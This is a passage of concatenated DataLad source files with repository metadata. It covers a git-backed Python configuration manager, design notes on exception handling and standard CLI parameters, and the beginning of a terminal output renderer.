simple dict\n # no subclassing, because we want to be largely read-only, and implement\n # config writing separately\n cfg={},\n # track the files that jointly make up the config in this store\n files=set(),\n # and their modification times to be able to avoid needless unforced reloads\n stats=None,\n )\n self._stores = dict(\n # populated with info from git\n git=store,\n # only populated with info from committed dataset config\n branch=store.copy(),\n )\n # merged representation (the only one that existed pre datalad 0.14)\n # will be built on initial reload\n self._merged_store = {}\n\n self._repo_dot_git = None\n self._repo_pathobj = None\n if dataset:\n if hasattr(dataset, 'dot_git'):\n # `dataset` is actually a Repo instance\n self._repo_dot_git = dataset.dot_git\n self._repo_pathobj = dataset.pathobj\n elif dataset.repo:\n self._repo_dot_git = dataset.repo.dot_git\n self._repo_pathobj = dataset.repo.pathobj\n\n self._config_cmd = ['git', 'config']\n # public dict to store variables that always override any setting\n # read from a file\n # `hasattr()` is needed because `datalad.cfg` is generated upon first module\n # import, hence when this code runs first, there cannot be any config manager\n # to inherit from\n self.overrides = datalad.cfg.overrides.copy() if hasattr(datalad, 'cfg') else {}\n if overrides is not None:\n self.overrides.update(overrides)\n if dataset is None:\n if source in ('branch', 'branch-local'):\n raise ValueError(\n 'ConfigManager configured to read from a branch of a dataset only, '\n 'but no dataset given')\n # The caller didn't specify a repository. 
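A small sketch of the `overrides` behaviour described in the class docstring above (the configuration key is arbitrary):

    from datalad.config import ConfigManager

    cfg = ConfigManager(overrides={"datalad.example.key": "from-override"})
    # overrides win over any file-based setting, but a DATALAD_EXAMPLE_KEY
    # environment variable would still take precedence
    print(cfg.get("datalad.example.key"))  # 'from-override'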
Unfortunately there is\n # no known way to tell git to ignore possible local git repository,\n # and unsetting of --git-dir could cause other problems.\n # See https://lore.kernel.org/git/[email protected]/T/ .\n # Setting the git directory to /dev/null or on Windows analogous nul file\n # (could be anywhere, see https://stackoverflow.com/a/27773642/1265472)\n # see allow to achieve the goal to prevent a repository in the current\n # working directory from leaking configuration into the output.\n nul = 'b:\\\\nul' if on_windows else '/dev/null'\n self._config_cmd = ['git', f'--git-dir={nul}', 'config']\n\n self._src_mode = source\n run_kwargs = dict()\n self._runner = None\n if dataset is not None:\n if hasattr(dataset, '_git_runner'):\n # `dataset` is actually a Repo instance\n self._runner = dataset._git_runner\n elif dataset.repo:\n self._runner = dataset.repo._git_runner\n else:\n # make sure we run the git config calls in the dataset\n # to pick up the right config files\n run_kwargs['cwd'] = dataset.path\n if self._runner is None:\n self._runner = GitRunner(**run_kwargs)\n\n self.reload(force=True)\n\n def reload(self, force=False):\n \"\"\"Reload all configuration items from the configured sources\n\n If `force` is False, all files configuration was previously read from\n are checked for differences in the modification times. If no difference\n is found for any file no reload is performed. This mechanism will not\n detect newly created global configuration files, use `force` in this case.\n \"\"\"\n run_args = ['-z', '-l', '--show-origin']\n\n # update from desired config sources only\n # 2-step strategy:\n # - load datalad dataset config from dataset\n # - load git config from all supported by git sources\n # in doing so we always stay compatible with where Git gets its\n # config from, but also allow to override persistent information\n # from dataset locally or globally\n\n # figure out what needs to be reloaded at all\n to_run = {}\n # committed branch config\n # well, actually not necessarily committed\n\n if self._src_mode != 'local' and self._repo_pathobj:\n # we have to read the branch config from this existing repo\n if self._repo_dot_git == self._repo_pathobj:\n # this is a bare repo, we go with the default HEAD,\n # if it has a config\n try:\n # will blow if absent\n self._runner.run([\n 'git', 'cat-file', '-e', 'HEAD:.datalad/config'],\n protocol=KillOutput)\n to_run['branch'] = run_args + [\n '--blob', 'HEAD:.datalad/config']\n except CommandError:\n # all good, just no branch config\n pass\n else:\n # non-bare repo\n # we could use the same strategy as for bare repos, and rely\n # on the committed config, however, for now we must pay off\n # the sins of the past and work with the file at hand\n dataset_cfgfile = self._repo_pathobj / DATASET_CONFIG_FILE\n if dataset_cfgfile.exists() and (\n force or self._need_reload(self._stores['branch'])):\n # we have the file and are forced or encourages to (re)load\n to_run['branch'] = run_args + [\n '--file', str(dataset_cfgfile)]\n\n if self._src_mode != 'branch' and (\n force or self._need_reload(self._stores['git'])):\n to_run['git'] = run_args + ['--local'] \\\n if self._src_mode == 'branch-local' \\\n else run_args\n\n # reload everything that was found todo\n while to_run:\n store_id, runargs = to_run.popitem()\n self._stores[store_id] = self._reload(runargs)\n\n # always update the merged representation, even if we did not reload\n # anything from a file. 
ENV or overrides could change independently\n # start with the commit dataset config\n merged = self._stores['branch']['cfg'].copy()\n # local config always takes precedence\n merged.update(self._stores['git']['cfg'])\n # superimpose overrides\n merged.update(self.overrides)\n # override with environment variables, unless we only want to read the\n # dataset's commit config\n if self._src_mode != 'branch':\n _update_from_env(merged)\n self._merged_store = merged\n\n def _need_reload(self, store):\n storestats = store['stats']\n if not storestats:\n return True\n\n # we have read files before\n # check if any file we read from has changed\n curstats = self._get_stats(store)\n return any(curstats[f] != storestats[f] for f in store['files'])\n\n def _reload(self, run_args):\n # query git-config\n stdout, stderr = self._run(\n run_args,\n protocol=StdOutErrCapture,\n # always expect git-config to output utf-8\n encoding='utf-8',\n )\n store = {}\n store['cfg'], store['files'] = parse_gitconfig_dump(\n stdout, cwd=self._runner.cwd)\n\n # update stats of config files, they have just been discovered\n # and should still exist\n store['stats'] = self._get_stats(store)\n return store\n\n def _get_stats(self, store):\n stats = {}\n for f in store['files']:\n if isinstance(f, Path):\n if f.exists():\n stat = f.stat()\n stats[f] = _stat_result(\n stat.st_ino,\n stat.st_size,\n stat.st_ctime,\n stat.st_mtime)\n else:\n stats[f] = None\n elif f.startswith('blob:'):\n # we record the specific shasum of the blob\n stats[f] = self._runner.run(\n ['git', 'rev-parse', f[5:]],\n protocol=StdOutErrCapture)['stdout'].strip()\n else:\n stats[f] = None\n return stats\n\n @_scope_reload\n @_where_to_scope\n def obtain(self, var, default=None, dialog_type=None, valtype=None,\n store=False, scope=None, reload=True, **kwargs):\n \"\"\"\n Convenience method to obtain settings interactively, if needed\n\n A UI will be used to ask for user input in interactive sessions.\n Questions to ask, and additional explanations can be passed directly\n as arguments, or retrieved from a list of pre-configured items.\n\n Additionally, this method allows for type conversion and storage\n of obtained settings. Both aspects can also be pre-configured.\n\n Parameters\n ----------\n var : str\n Variable name including any section like `git config` expects them,\n e.g. 'core.editor'\n default : any type\n In interactive sessions and if `store` is True, this default value\n will be presented to the user for confirmation (or modification).\n In all other cases, this value will be silently assigned unless\n there is an existing configuration setting.\n dialog_type : {'question', 'yesno', None}\n Which dialog type to use in interactive sessions. 
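In its simplest non-interactive form (the key and default below are chosen arbitrarily, and nothing is stored), `obtain` behaves like a `get` with a fallback:

    import datalad

    # returns the configured value if the key is set anywhere,
    # otherwise silently falls back to the provided default
    email = datalad.cfg.obtain("user.email", default="[email protected]", store=False)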
If `None`,\n pre-configured UI options are used.\n store : bool\n Whether to store the obtained value (or default)\n %s\n `**kwargs`\n Additional arguments for the UI function call, such as a question\n `text`.\n \"\"\"\n # do local import, as this module is import prominently and the\n # could theoretically import all kind of weird things for type\n # conversion\n from datalad.interface.common_cfg import definitions as cfg_defs\n\n # fetch what we know about this variable\n cdef = cfg_defs.get(var, {})\n # type conversion setup\n if valtype is None and 'type' in cdef:\n valtype = cdef['type']\n if valtype is None:\n valtype = lambda x: x\n\n # any default?\n if default is None and 'default' in cdef:\n default = cdef['default']\n\n _value = None\n if var in self:\n # nothing needs to be obtained, it is all here already\n _value = self[var]\n elif store is False and default is not None:\n # nothing will be stored, and we have a default -> no user confirmation\n # we cannot use logging, because we want to use the config to configure\n # the logging\n #lgr.debug('using default {} for config setting {}'.format(default, var))\n _value = default\n\n if _value is not None:\n # we got everything we need and can exit early\n try:\n return valtype(_value)\n except Exception as e:\n raise ValueError(\n \"value '{}' of existing configuration for '{}' cannot be \"\n \"converted to the desired type '{}' ({})\".format(\n _value, var, valtype, e)) from e\n\n # now we need to try to obtain something from the user\n from datalad.ui import ui\n\n # configure UI\n dialog_opts = kwargs\n if dialog_type is None: # no override\n # check for common knowledge on how to obtain a value\n if 'ui' in cdef:\n dialog_type = cdef['ui'][0]\n # pull standard dialog settings\n dialog_opts = cdef['ui'][1]\n # update with input\n dialog_opts.update(kwargs)\n\n if (not ui.is_interactive or dialog_type is None) and default is None:\n raise RuntimeError(\n \"cannot obtain value for configuration item '{}', \"\n \"not preconfigured, no default, no UI available\".format(var))\n\n if not hasattr(ui, dialog_type):\n raise ValueError(\"UI '{}' does not support dialog type '{}'\".format(\n ui, dialog_type))\n\n # configure storage destination, if needed\n if store:\n if scope is None and 'destination' in cdef:\n scope = cdef['destination']\n if scope is None:\n raise ValueError(\n \"request to store configuration item '{}', but no \"\n \"storage destination specified\".format(var))\n\n # obtain via UI\n dialog = getattr(ui, dialog_type)\n _value = dialog(default=default, **dialog_opts)\n\n if _value is None:\n # we got nothing\n if default is None:\n raise RuntimeError(\n \"could not obtain value for configuration item '{}', \"\n \"not preconfigured, no default\".format(var))\n # XXX maybe we should return default here, even it was returned\n # from the UI -- if that is even possible\n\n # execute type conversion before storing to check that we got\n # something that looks like what we want\n try:\n value = valtype(_value)\n except Exception as e:\n raise ValueError(\n \"cannot convert user input `{}` to desired type ({})\".format(\n _value, e)) from e\n # XXX we could consider \"looping\" until we have a value of proper\n # type in case of a user typo...\n\n if store:\n # store value as it was before any conversion, needs to be str\n # anyway\n # needs string conversion nevertheless, because default could come\n # in as something else\n self.add(var, '{}'.format(_value), scope=scope, reload=reload)\n return value\n\n def 
__repr__(self):\n # give full list of all tracked config files, plus overrides\n return \"ConfigManager({}{})\".format(\n [str(p) for p in self._stores['branch']['files'].union(\n self._stores['git']['files'])],\n ', overrides={!r}'.format(self.overrides) if self.overrides else '',\n )\n\n def __str__(self):\n # give path of dataset, if there is any, plus overrides\n return \"ConfigManager({}{})\".format(\n self._repo_pathobj if self._repo_pathobj else '',\n 'with overrides' if self.overrides else '',\n )\n\n #\n # Compatibility with dict API\n #\n def __len__(self):\n return len(self._merged_store)\n\n def __getitem__(self, key):\n return self._merged_store.__getitem__(key)\n\n def __contains__(self, key):\n return self._merged_store.__contains__(key)\n\n def keys(self):\n \"\"\"Returns list of configuration item names\"\"\"\n return self._merged_store.keys()\n\n # XXX should this be *args?\n def get(self, key, default=None, get_all=False):\n \"\"\"D.get(k[,d]) -> D[k] if k in D, else d. d defaults to None.\n\n Parameters\n ----------\n default : optional\n Value to return when key is not present. `None` by default.\n get_all : bool, optional\n If True, return all values of multiple identical configuration keys.\n By default only the last specified value is returned.\n \"\"\"\n try:\n val = self[key]\n if get_all or not isinstance(val, tuple):\n return val\n else:\n return val[-1]\n except KeyError:\n # return as-is, default could be a tuple, hence do not subject to\n # get_all processing\n return default\n\n def get_from_source(self, source, key, default=None):\n \"\"\"Like get(), but a source can be specific.\n\n If `source` is 'branch', only the committed configuration is queried,\n overrides are applied. In the case of 'local', the committed\n configuration is ignored, but overrides and configuration from\n environment variables are applied as usual.\n \"\"\"\n # TODO: remove along with the removal of deprecated 'where'\n if source == 'dataset':\n warnings.warn(\"'source=\\\"%s\\\"' is deprecated, use 'source=\\\"%s\\\"' instead\"\n % (source, 'branch'),\n DeprecationWarning)\n source = 'branch'\n if source not in ('branch', 'local'):\n raise ValueError(\"source must be 'branch' or 'local'\")\n if source == 'branch':\n return self.overrides.get(\n key,\n self._stores['branch']['cfg'].get(\n key,\n default))\n else:\n if key not in self._stores['branch']['cfg']:\n # the key is not in the committed config, hence we can\n # just report based on the merged representation\n return self.get(key, default)\n else:\n # expensive case, rebuild a config without the committed\n # dataset config contributing\n env = {}\n _update_from_env(env)\n return env.get(\n key,\n self.overrides.get(\n key,\n self._stores['git']['cfg'].get(\n key,\n default)))\n\n #\n # Compatibility with ConfigParser API\n #\n def sections(self):\n \"\"\"Returns a list of the sections available\"\"\"\n return list(set([cfg_section_regex.match(k).group(1) for k in self._merged_store]))\n\n def options(self, section):\n \"\"\"Returns a list of options available in the specified section.\"\"\"\n opts = []\n for k in self._merged_store:\n sec, opt = cfg_sectionoption_regex.match(k).groups()\n if sec == section:\n opts.append(opt)\n return opts\n\n def has_section(self, section):\n \"\"\"Indicates whether a section is present in the configuration\"\"\"\n for k in self._merged_store:\n if k.startswith(section):\n return True\n return False\n\n def has_option(self, section, option):\n \"\"\"If the given section exists, and contains 
the given option\"\"\"\n for k in self._merged_store:\n sec, opt = cfg_sectionoption_regex.match(k).groups()\n if sec == section and opt == option:\n return True\n return False\n\n def _get_type(self, typefn, section, option):\n key = '.'.join([section, option])\n # Mimic the handling of get_value(..., default=None), while still going\n # through get() in order to get its default tuple handling.\n if key not in self:\n raise KeyError(key)\n return typefn(self.get(key))\n\n def getint(self, section, option):\n \"\"\"A convenience method which coerces the option value to an integer\"\"\"\n return self._get_type(int, section, option)\n\n def getfloat(self, section, option):\n \"\"\"A convenience method which coerces the option value to a float\"\"\"\n return self._get_type(float, section, option)\n\n def getbool(self, section, option, default=None):\n \"\"\"A convenience method which coerces the option value to a bool\n\n Values \"on\", \"yes\", \"true\" and any int!=0 are considered True\n Values which evaluate to bool False, \"off\", \"no\", \"false\" are considered\n False\n TypeError is raised for other values.\n \"\"\"\n key = '.'.join([section, option])\n # Mimic the handling of get_value(..., default=None), while still going\n # through get() in order to get its default tuple handling.\n if default is None and key not in self:\n raise KeyError(key)\n val = self.get(key, default=default)\n if val is None: # no value at all, git treats it as True\n return True\n return anything2bool(val)\n\n # this is a hybrid of ConfigParser and dict API\n def items(self, section=None):\n \"\"\"Return a list of (name, value) pairs for each option\n\n Optionally limited to a given section.\n \"\"\"\n if section is None:\n return self._merged_store.items()\n return [(k, v) for k, v in self._merged_store.items()\n if cfg_section_regex.match(k).group(1) == section]\n\n #\n # Compatibility with GitPython's ConfigParser\n #\n def get_value(self, section, option, default=None):\n \"\"\"Like `get()`, but with an optional default value\n\n If the default is not None, the given default value will be returned in\n case the option did not exist. 
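A brief sketch of these ConfigParser-style accessors on the global configuration manager (section and option names are examples; the defaults keep the calls safe when the options are unset):

    import datalad

    cfg = datalad.cfg
    name = cfg.get("user.name", default="unknown")            # dict-style
    same = cfg.get_value("user", "name", default="unknown")   # ConfigParser-style
    flag = cfg.getbool("datalad", "example.verbose", default=False)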
This behavior imitates GitPython's\n config parser.\n \"\"\"\n try:\n return self['.'.join((section, option))]\n except KeyError as e:\n # this strange dance is needed because gitpython does it this way\n if default is not None:\n return default\n else:\n raise e\n\n #\n # Modify configuration (proxy respective git-config call)\n #\n @_scope_reload\n def _run(self, args, scope=None, reload=False, **kwargs):\n \"\"\"Centralized helper to run \"git config\" calls\n\n Parameters\n ----------\n args : list\n Arguments to pass for git config\n %s\n **kwargs\n Keywords arguments for Runner's call\n \"\"\"\n if scope:\n args = self._get_location_args(scope) + args\n if '-l' in args:\n # we are just reading, no need to reload, no need to lock\n out = self._runner.run(self._config_cmd + args, **kwargs)\n return out['stdout'], out['stderr']\n\n # all other calls are modifications\n if '--file' in args:\n # all paths we are passing are absolute\n custom_file = Path(args[args.index('--file') + 1])\n custom_file.parent.mkdir(exist_ok=True)\n lockfile = None\n if self._repo_dot_git and ('--local' in args or '--file' in args):\n # modification of config in a dataset\n lockfile = self._repo_dot_git / 'config.dataladlock'\n else:\n # follow pattern in downloaders for lockfile location\n lockfile = Path(self.obtain('datalad.locations.locks')) \\\n / 'gitconfig.lck'\n\n with ConfigManager._run_lock, InterProcessLock(lockfile, logger=lgr):\n out = self._runner.run(self._config_cmd + args, **kwargs)\n\n if reload:\n self.reload()\n # this function is only used to modify config. If any manager\n # has modified the global scope, and is not itself the global\n # manager, we reload that one too in order to avoid stale\n # configuration reports\n if scope == 'global' and self is not datalad.cfg:\n datalad.cfg.reload()\n return out['stdout'], out['stderr']\n\n def _get_location_args(self, scope, args=None):\n if args is None:\n args = []\n cfg_labels = ('branch', 'local', 'global', 'override')\n if scope not in cfg_labels:\n raise ValueError(\n \"unknown configuration label '{}' (not in {})\".format(\n scope, cfg_labels))\n if scope == 'branch':\n if not self._repo_pathobj:\n raise ValueError(\n 'ConfigManager cannot store configuration to dataset, '\n 'none specified')\n dataset_cfgfile = self._repo_pathobj / DATASET_CONFIG_FILE\n args.extend(['--file', str(dataset_cfgfile)])\n elif scope == 'global':\n args.append('--global')\n elif scope == 'local':\n args.append('--local')\n return args\n\n @_scope_reload\n @_where_to_scope\n def add(self, var, value, scope='branch', reload=True):\n \"\"\"Add a configuration variable and value\n\n Parameters\n ----------\n var : str\n Variable name including any section like `git config` expects them, e.g.\n 'core.editor'\n value : str\n Variable value\n %s\"\"\"\n if scope == 'override':\n from datalad.utils import ensure_list\n val = ensure_list(self.overrides.pop(var, None))\n val.append(value)\n self.overrides[var] = val[0] if len(val) == 1 else val\n if reload:\n self.reload(force=True)\n return\n\n self._run(['--add', var, value], scope=scope, reload=reload,\n protocol=StdOutErrCapture)\n\n @_scope_reload\n @_where_to_scope\n def set(self, var, value, scope='branch', reload=True, force=False):\n \"\"\"Set a variable to a value.\n\n In opposition to `add`, this replaces the value of `var` if there is\n one already.\n\n Parameters\n ----------\n var : str\n Variable name including any section like `git config` expects them, e.g.\n 'core.editor'\n value : str\n Variable 
value\n force: bool\n if set, replaces all occurrences of `var` by a single one with the\n given `value`. Otherwise raise if multiple entries for `var` exist\n already\n %s\"\"\"\n if scope == 'override':\n self.overrides[var] = value\n if reload:\n self.reload(force=True)\n return\n\n from datalad.support.gitrepo import to_options\n\n self._run(to_options(replace_all=force) + [var, value],\n scope=scope, reload=reload, protocol=StdOutErrCapture)\n\n @_scope_reload\n @_where_to_scope\n def rename_section(self, old, new, scope='branch', reload=True):\n \"\"\"Rename a configuration section\n\n Parameters\n ----------\n old : str\n Name of the section to rename.\n new : str\n Name of the section to rename to.\n %s\"\"\"\n if scope == 'override':\n self.overrides = {\n (new + k[len(old):]) if k.startswith(old + '.') else k: v\n for k, v in self.overrides.items()\n }\n if reload:\n self.reload(force=True)\n return\n\n self._run(['--rename-section', old, new], scope=scope, reload=reload)\n\n @_scope_reload\n @_where_to_scope\n def remove_section(self, sec, scope='branch', reload=True):\n \"\"\"Rename a configuration section\n\n Parameters\n ----------\n sec : str\n Name of the section to remove.\n %s\"\"\"\n if scope == 'override':\n self.overrides = {\n k: v\n for k, v in self.overrides.items()\n if not k.startswith(sec + '.')\n }\n if reload:\n self.reload(force=True)\n return\n\n self._run(['--remove-section', sec], scope=scope, reload=reload)\n\n @_scope_reload\n @_where_to_scope\n def unset(self, var, scope='branch', reload=True):\n \"\"\"Remove all occurrences of a variable\n\n Parameters\n ----------\n var : str\n Name of the variable to remove\n %s\"\"\"\n if scope == 'override':\n self.overrides.pop(var, None)\n if reload:\n self.reload(force=True)\n return\n\n # use unset all as it is simpler for now\n self._run(['--unset-all', var], scope=scope, reload=reload)\n\n\ndef rewrite_url(cfg, url):\n \"\"\"Any matching 'url.<base>.insteadOf' configuration is applied\n\n Any URL that starts with such a configuration will be rewritten\n to start, instead, with <base>. 
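A compact sketch of this rewriting with an inline mapping (the short `gh:` prefix is an invented example; in practice the mapping would come from `url.<base>.insteadOf` settings in a config file):

    from datalad.config import rewrite_url

    cfg_like = {"url.https://github.com/.insteadof": "gh:"}
    print(rewrite_url(cfg_like, "gh:datalad/datalad"))
    # -> https://github.com/datalad/datalad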
When more than one insteadOf\n strings match a given URL, the longest match is used.\n\n Parameters\n ----------\n cfg : ConfigManager or dict\n dict-like with configuration variable name/value-pairs.\n url : str\n URL to be rewritten, if matching configuration is found.\n\n Returns\n -------\n str\n Rewritten or unmodified URL.\n \"\"\"\n insteadof = {\n # only leave the base url\n k[4:-10]: v\n for k, v in cfg.items()\n if k.startswith('url.') and k.endswith('.insteadof')\n }\n\n # all config that applies\n matches = {\n key: v\n for key, val in insteadof.items()\n for v in (val if isinstance(val, tuple) else (val,))\n if url.startswith(v)\n }\n # find longest match, like Git does\n if matches:\n rewrite_base, match = sorted(\n matches.items(),\n key=lambda x: len(x[1]),\n reverse=True,\n )[0]\n if sum(match == v for v in matches.values()) > 1:\n lgr.warning(\n \"Ignoring URL rewrite configuration for '%s', \"\n \"multiple conflicting definitions exists: %s\",\n match,\n ['url.{}.insteadof'.format(k)\n for k, v in matches.items()\n if v == match]\n )\n else:\n url = '{}{}'.format(rewrite_base, url[len(match):])\n return url\n\n\n# for convenience, bind to class too\nConfigManager.rewrite_url = rewrite_url\n\n#\n# Helpers for bypassing git-config when _writing_ config items,\n# mostly useful when a large number of changes needs to be made\n# and directly file manipulation without a safety net is worth\n# the risk for performance reasons.\n#\n\ndef quote_config(v):\n \"\"\"Helper to perform minimal quoting of config keys/value parts\n\n Parameters\n ----------\n v : str\n To-be-quoted string\n \"\"\"\n white = (' ', '\\t')\n comment = ('#', ';')\n # backslashes need to be quoted in any case\n v = v.replace('\\\\', '\\\\\\\\')\n # must not have additional unquoted quotes\n v = v.replace('\"', '\\\\\"')\n if v[0] in white or v[-1] in white or any(c in v for c in comment):\n # quoting the value due to leading/trailing whitespace\n # or occurrence of comment char\n v = '\"{}\"'.format(v)\n return v\n\n\ndef write_config_section(fobj, suite, name, props):\n \"\"\"Write a config section with (multiple) settings.\n\n Parameters\n ----------\n fobj : File\n Opened target file\n suite : str\n First item of the section name, e.g. 'submodule', or\n 'datalad'\n name : str\n Remainder of the section name\n props : dict\n Keys are configuration setting names within the section\n context (i.e. not duplicating `suite` and/or `name`, values\n are configuration setting values.\n \"\"\"\n fmt = '[{_suite_} {_q_}{_name_}{_q_}]\\n'\n for p in props:\n fmt += '\\t{p} = {{{p}}}\\n'.format(p=p)\n quoted_name = quote_config(name)\n fobj.write(\n fmt.format(\n _suite_=suite,\n _q_='' if quoted_name.startswith('\"') else '\"',\n _name_=quoted_name,\n **{k: quote_config(v) for k, v in props.items()}))\n\n\ndef warn_on_undefined_git_identity(cfg: ConfigManager):\n \"\"\"Check whether a Git identity is defined, and warn if not\"\"\"\n for cfgkey, envs in (\n ('user.name', ('GIT_AUTHOR_NAME', 'GIT_COMMITTER_NAME')),\n ('user.email', ('GIT_AUTHOR_EMAIL', 'GIT_COMMITTER_EMAIL'))):\n if cfgkey not in cfg \\\n and not any(e in os.environ for e in envs):\n lgr.warning(\n \"It is highly recommended to configure Git before using \"\n \"DataLad. 
Set both 'user.name' and 'user.email' \"\n \"configuration variables.\"\n )\n break # one warning enough\n" }, { "alpha_fraction": 0.7530511617660522, "alphanum_fraction": 0.7546091675758362, "avg_line_length": 43.77906799316406, "blob_id": "cb9a1620aedd35f3e2ba4b59f24f8d484008b696", "content_id": "5ebf01cae85e5411461707e968fe4f39ba39b41c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3851, "license_type": "permissive", "max_line_length": 80, "num_lines": 86, "path": "/docs/source/design/exception_handling.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_exception_handling:\n\n******************\nException handling\n******************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation target.\n\n\nCatching exceptions\n===================\n\nWhenever we catch an exception in an ``except`` clause, the following rules\napply:\n\n- unless we (re-)raise, the first line instantiates a\n :class:`~datalad.support.exceptions.CapturedException`::\n\n except Exception as e:\n ce = CapturedException(e)\n\n First, this ensures a low-level (8) log entry including the traceback of that\n exception. The depth of the included traceback can be limited by setting the\n ``datalad.exc.str.tb_limit`` config accordingly.\n\n Second, it deletes the frame stack references of the exception and keeps\n textual information only, in order to avoid circular references, where an\n object (whose method raised the exception) isn't going to be picked by the\n garbage collection. This can be particularly troublesome if that object holds\n a reference to a subprocess for example. However, it's not easy to see in what\n situation this would really be needed and we never need anything other than\n the textual information about what happened. Making the reference cleaning a\n general rule is easiest to write, maintain and review.\n\n- if we raise, neither a log entry nor such a\n :class:`~datalad.support.exceptions.CapturedException` instance is to be\n created.\n Eventually, there will be a spot where that (re-)raised exception is caught.\n This then is the right place to log it. That log entry will have the\n traceback, there's no need to leave a trace by means of log messages!\n\n- if we raise, but do not simply reraise that exact same exception, in order to\n change the exception class and/or its message, ``raise from`` must be used!::\n\n except SomeError as e:\n raise NewError(\"new message\") from e\n\n This ensures that the original exception is properly registered as the cause\n for the exception via its ``__cause__`` attribute. Hence, the original\n exception's traceback will be part of the later on logged traceback of the new\n exception.\n\n\nMessaging about an exception\n============================\n\nIn addition to the auto-generated low-level log entry there might be a need to\ncreate a higher-level log, a user message or a (result) dictionary that includes\ninformation from that exception. 
While such messaging may use anything the\n(captured) exception provides, please consider that \"technical\" details about an\nexception are already auto-logged and generally not incredibly meaningful for\nusers.\n\nFor message creation :class:`~datalad.support.exceptions.CapturedException`\ncomes with a couple of ``format_*`` helper methods, its ``__str__`` provides a\nshort representation of the form ``ExceptionClass(message)`` and its\n``__repr__`` the log form with a traceback that is used for the auto-generated\nlog.\n\nFor result dictionaries :class:`~datalad.support.exceptions.CapturedException`\ncan be assigned to the field ``exception``. Currently, ``get_status_dict`` will\nconsider this field and create an additional field with a traceback string.\nHence, whether putting a captured exception into that field actually has an\neffect depends on whether ``get_status_dict`` is subsequently used with that\ndictionary. In the future such functionality may move into result renderers\ninstead, leaving the decision of what to do with the passed\n:class:`~datalad.support.exceptions.CapturedException` to them. Therefore, even\nif of no immediate effect, enhancing the result dicts accordingly makes sense\nalready, since it may be useful when using datalad via its python interface\nalready and provide instant benefits whenever the result rendering gets such an\nupgrade.\n" }, { "alpha_fraction": 0.7404113411903381, "alphanum_fraction": 0.7431906461715698, "avg_line_length": 36.5, "blob_id": "e466d1886304f840c73b774f443c5160aa400252", "content_id": "52b0ee80ac7d0c18dc478ca23d8e7ecac6cc9ff1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1799, "license_type": "permissive", "max_line_length": 146, "num_lines": 48, "path": "/docs/source/design/standard_parameters.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_standard_parameters:\n\n*******************\nStandard parameters\n*******************\n\n.. 
topic:: Specification scope and status\n\n This specification partially describes the current implementation, and partially is a proposal, subject to review and further discussion.\n\nSeveral \"standard parameters\" are used in various DataLad commands.\nThose standard parameters have an identical meaning across the commands they are used in.\nCommands should ensure that they use those \"standard parameters\" where applicable and do not deviate from the common names nor the common meaning.\n\nCurrently used standard parameters are listed below, as well as suggestions on how to harmonize currently deviating standard parameters.\nDeviations from the agreed upon list should be harmonized.\nThe parameters are listed in their command-line form, but similar names and descriptions apply to their Python form.\n\n``-d``/``--dataset``\n A pointer to the dataset that a given command should operate on\n\n``--dry-run``\n Display details about the command execution without actually running the command.\n\n``-f``/``--force``\n Enforce the execution of a command, even when certain security checks would normally prevent this\n\n``-J``/``--jobs``\n Number of parallel jobs to use.\n\n``-m``/``--message``\n A commit message to attach to the saved change of a command execution.\n\n``-r``/``--recursive``\n Perform an operation recursively across subdatasets\n\n``-R``/``--recursion-limit``\n Limit recursion to a given amount of subdataset levels\n\n``-s``/``--sibling-name`` [SUGGESTION]\n The identifier for a dataset sibling (remote)\n\n\nCertain standard parameters will have their own design document.\nPlease refer to those documents for more in-depth information." }, { "alpha_fraction": 0.5799620747566223, "alphanum_fraction": 0.5799620747566223, "avg_line_length": 28.570093154907227, "blob_id": "48becc696914db8b57493abbea7663df7284e44c", "content_id": "8b2ebe6b470e3eeb10c3be553980bf9d9a97b37e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3164, "license_type": "permissive", "max_line_length": 77, "num_lines": 107, "path": "/datalad/cli/renderer.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Render results in a terminal\"\"\"\n\nfrom collections import (\n defaultdict,\n)\nimport string\nfrom datalad.ui import ui\n\nNA_STRING = 'N/A' # we might want to make it configurable via config\n\n\nclass nagen(object):\n \"\"\"A helper to provide a desired missing value if no value is known\n\n Usecases\n\n - could be used as a generator for `defaultdict`\n - since it returns itself upon getitem, should work even for complex\n nested dictionaries/lists .format templates\n \"\"\"\n def __init__(self, missing=NA_STRING):\n self.missing = missing\n\n def __repr__(self):\n cls = self.__class__.__name__\n args = str(self.missing) if self.missing != NA_STRING else ''\n return '%s(%s)' % (cls, args)\n\n def __str__(self):\n return self.missing\n\n def __getitem__(self, *args):\n return self\n\n def __getattr__(self, item):\n return self\n\n\ndef nadict(*items):\n \"\"\"A generator of default dictionary with the default nagen\"\"\"\n dd = defaultdict(nagen)\n dd.update(*items)\n return dd\n\n\nclass DefaultOutputFormatter(string.Formatter):\n \"\"\"A custom formatter for default output rendering using .format\n \"\"\"\n # TODO: make missing configurable?\n def __init__(self, missing=nagen()):\n \"\"\"\n Parameters\n ----------\n missing: string, optional\n What to output for the missing values\n \"\"\"\n 
